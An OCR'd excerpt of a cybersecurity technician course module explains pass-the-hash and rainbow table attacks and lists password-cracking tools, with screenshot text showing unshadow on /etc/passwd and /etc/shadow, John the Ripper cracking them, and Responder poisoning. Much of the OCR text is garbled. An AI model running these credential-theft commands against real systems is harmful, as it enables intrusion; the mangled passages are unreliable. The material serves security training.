Chapter 2 - 04 - Understand Application-level and OS-level Attacks - 10_ocred.pdf

Full Transcript

Certified Cybersecurity Technician Information Security Attacks Exam 212-82 Hash Injection/Pass-the-Hash (PtH) Attack A hash injection/PtH attack allows an attacker to inject a compromised hash into a local session and use the hash to validate network resources @ The attacker finds and extracts a logged-on domain admin account hash The attacker uses the extracted hash to log on to the domain controller Logged-on hashesare stored in the SAM file :-........... l.j--...i....................-..-.....u.u) o : 2 ser logs. on : Compromises server I usinga local/remote exploit eeesasasesesesaseteaetsatatasatirestsesrtarnsraarnsanaanat : 9 g B OO — User Server > " RN, Extracts a logged-on domain admin account hash (Domain Controller) Inject a compromised hash into a local session o User Computer Hash Injection/Pass-the-Hash (PtH) Attack This type of attack is possible when the target system uses a hash function as part of the authentication process to authenticate its users. Generally, the system stores hash values of the credentials in the SAM database/file on a Windows computer. In such cases, the server computes the hash value of the user-submitted credentials or allows the user to input the hash value directly. The server then checks it against the stored hash value for authentication. Logged-on hashes are using stored in the SAM file Compromises server a local/remote exploit Gooovossessonnsen bbbt Feetssensetsensensseesansinsetsatsntsassansansenee] >. User |°gs on EEE ‘2 LTI T P PP TP B e iabsianadantt PP PP. User Server (Domain Controller) ----------------------------------------------------------------------------------------------- Inject a compromised hash into a local session User Computer Attacker Figure 2.44: Hash injection attack Attackers exploit such authentication mechanisms and first exploit the target server to retrieve the hashes from the SAM databases. They then input the hashes acquired directly into the authentication mechanism to authenticate with the user’s stolen pre-computed hashes. Thus, in a hash injection/PtH attack, the attackers inject a compromised LanMan (LM) or NTLM hash into a local session and then use the hash to authenticate to the network resources. Any server or service (running on Windows, UNIX, or any other OS) using NTLM or LM authentication is susceptible to this attack. This attack can be launched on any OS, but Windows could be more vulnerable owing to its Single-Sign-On (SSO) feature that stores passwords inside the system and enables users to access all the resources with a one-time login. Module 02 Page 270 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Attacks Exam 212-82 Rainbow Table Attack ¢ A4 Rainbow. A precomputed table that contains word lists like dictionary files, brute force lists, and their hash values Comparethe | The hash of passwords is captured and compared with the precomputed hash Easy to Recover ' It is easy to recover passwords by comparing the captured password hashes to the precomputed tables Hashes table. If a match is found, then the password gets cracked Precomputed Hashes E lgazwed e hh021lda weeeeeer +¢c744b1716cb£8d4dd0££f4ce31a177151 9daBdasf e SOdifoBSE +4259cc34599¢530b28a6a8£225d668590 +3cd696a8571a843cdad53a229d741843 wrereen #c744b1716cb£8d4dd0££f4ce31a177151 L Al Rights Reserved, Reproduction is Str Rainbow Table Attack A rainbow table attack uses the cryptanalytic time—memory trade-off technique, which requires less time than other techniques. It uses already-calculated information stored in memory to crack the encryption. In the rainbow table attack, the attacker creates a table of all the possible passwords and their respective hash values, known as a rainbow table, in advance. Attackers use tools such as RainbowCrack to perform rainbow table attack. = Rainbow Table: A rainbow table is a precomputed table that contains word lists like dictionary files and brute-force lists and their hash values. It is a lookup table specially used in recovering a plaintext password from a ciphertext. The attacker uses this table to look for the password and tries to recover it from password hashes. = Computed Hashes: An attacker computes the hash for a list of possible passwords and compares it to the pre-computed hash table (rainbow table). If attackers find a match, they can crack the password. = Compare the Hashes: An attacker captures the hash of a password and compares it with the precomputed hash table. If a match is found, then the password is cracked. It is easy to recover passwords by comparing captured password hashes to the pre-computed tables. Module 02 Page 271 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Attacks Exam 212-82 Examples of pre-computed hashes: lgazwed =wreeeeees »4259cc34599¢c530b28a6a8£225d4668590 hh021lda «eeeereees »c744bl716cbf8d4dd0ff4ce31al77151 9daB8dasf crreereees »3cd696a8571a843cdad53a229d741843 sodifo8sf serererees »>c744bl716cbf8d4dd0ff4ce31al77151 Figure 2.45: Pre-computed hashes Module 02 Page 272 Certified Cybersecurity Technician Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Attacks Exam 212-82 Password-Cracking Tools ;5 5;- Nt O Responderisan LLMNR, NBT-NS, and MDNS || poisoner.Itrespondsto specificNBT-NS (NetBIOS Name Service) queries based on their name suffix A Responder John the Ripper is an open-source password security auditing and password recovery tool available for many operating systems ubuntu@ubuntu: ~/Responder udo. /Responder.py -1 ensd) Author: Laurent Caffie ([email protected]) To kill this script hit CRIL.C | ' Polsoners: https.//www.openwoll.com h 4 hreps://github.com L — Password-Cracking Tools (Cont’d) LOphtCrack A tool designed to audit passwords and recover applications el ophcrack https://ophcrack.sourceforge.io e == =S "~| heeps:/fwww.I0phtcrock. com v RainbowCrack == [5 http://project-rainbowcrack.com ) ' hashcat https://hashcat.net THC-Hydra https://github.com Copyright © by EC-Council.All Rights Reserved. Reproduction Is Strictly Prohibited. Password-Cracking Tools Password-cracking tools allow you to reset unknown or lost Windows local administrator, domain administrator, and other user account passwords. In the case of forgotten passwords, it even allows users instant access to their locked computer without reinstalling Windows. Attackers can use password-cracking tools to crack the passwords of the target system. Module 02 Page 273 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Attacks = Exam 212-82 Responder Source: https://github.com Responder is an LLMNR, (NetBIOS Name NBT-NS, and MDNS Service) queries based poisoner. It responds to specific NBT-NS on their name suffix. By default, the tool only responds to a File Server Service request, which is for SMB. Q ubuntu@ubuntu: ~/Responder ubuntu@ubuntu: NBT-NS, Author: To kill [+] LLMNR $ sudo./Responder.py & Responder MDNS -I ens33 2.3 Laurent Gaffie ([email protected]) this script hit CRTL-C Poisoners: LLMNR NBT-NS DNS/MDNS Servers: HTTP server HTTPS server WPAD proxy SMB server Kerberos server SQL server FTP server IMAP server POP3 server SMTP server DNS server LDAP server [ON] [ON] [ON] [ON] [ON] [ON] [ON] [ON] [ON] [ON] [ON] [ON] [ON] [ON] Figure 2.46: Screenshot of Responder Module 02 Page 274 Certified Cybersecurity Technician Copyright © by EG-Gouncil All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Attacks = Exam 212-82 John the Ripper Source: https://www.openwall.com John the Ripper is an open-source password security auditing and password recovery tool available for many operating systems. It supports hundreds of hash and cipher types, including those for: user passwords of Unix, macOS, Windows, "web apps", groupware and database servers. ( N ) File Parrot Terminal Edit View Search @parrot #vim + Help |-~ /home/attacker/Desktop/Wordlists/Passwords.txt Stopped ]-[root@parrot #unshadow Created Terminal /etc/passwd directory: yt@parrot #john vim |~ /etc/shadow /root/.john 1 > target-file --wordlist=/home/attacker/Desktop/Wordlists/Passwords.txt Using default input encoding: Loaded 7 password hashes with Cost /home/attacker/Desktop/Wordlists/Passwords.txt (iteration count) is UTF-8 7 different 5000 for all salts loaded Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other apple (martin) test@123 (shiela) alpha (jason) qwerty@l23 (larry) Z1BGZw (sam) 50 0:00:00:01 DONE (2021-07-13 05:03) 4.901g/s Use the Session "--show" completed option to display (sha512crypt, target-file crypt(3) $6% [SHA512 128/128 SSE2 2x]) hashes key for 169.6p/s all of the cracked status 1010c/s passwords 1010C/s reliably Teqilla..ZZ t@parrot Figure 2.47: Screenshot of John the Ripper Module 02 Page 275 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Attacks = Exam 212-82 LOphtCrack Source: https://www.lOphtcrack.com LOphtCrack is a tool designed to audit passwords and recover applications. It recovers lost Microsoft Windows passwords with the help of a dictionary, hybrid, rainbow table, and brute-force attacks, and it also checks the strength of the password. As shown in the screenshot, attackers use LOphtCrack to crack the password of the target to gain access to the system. “F LOphtCrack 7 - v7.1.5 Win64 [Unnamed Session) * =wmn @ - =] X war Ths table shows al the imported accounts and their status while craddng. Accounts that have been cracked will show up with a red badkground If they are not locked-out, dsabled, or expred. If an account is aracked but it is dsabled, locked-out, or expired, the text color wil be red. To select accounts in bulk, you can didk the hyperinked labels on the top bar labsled 'Al Accounts’, 'Cracked’, Expired’, etc. To access remediation and copy fremove operations, there is a menu when you right clck on accounts you have selected., To show or hide columns in the table, dick the uppereft corner button. To sort the rows, dick on the column headers, dicking twice wil sort in the other direction. All Accounts: Reports = Y Queue 4 |7 - Cracked: Partially Cracked: Username. - Schedule 6 Guest - 0 Selected: |0 ocdked Out: ycabled: NTL¥M Hash — 31DECFEODIEARS31B73C5SD7EOCOBSCO. » Defaulticcount Documentation 0 1 3 Expired: 0 Non-Expiring: Kxacked (No Password): instantly Cracked (No Password): instantly Cracked (Dictionary:Complex): Ezacked (Dictiocnarzy:Corplex): Cracked (Dictionary:Corplex): Cracked (Dictionary:Complex): | § 1 31DECFEODIEAES31B73CESDTEQCORSCO DOBAOOSEFF24F3F010D 4 marcin Administrator 3. jason £ shiela Current Operation: Node 1: ¢ SEBETDFAO74DASEESAEFIFAAZBBDEGTE $2937545R510014341DEIF72E500D4TF 2D20D252A47SF405CDFEEL71DS3SAEBY | 1 | 1 | | |\ OCBES48805F757BF2AB2807573B85537 Stopped test 1 Thermal Monitor: CPU Utiization: (shiela) Figure 2.48: Screenshot of LOphtCrack Some password-cracking tools are listed as follows: = Ophcrack (https://ophcrack.sourceforge.io) = RainbowCrack (http://project-rainbowcrack.com) = hashcat (https://hashcat.net) = THC-Hydra (https://github.com) Module 02 Page 276 Certified Cybersecurity Technician Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.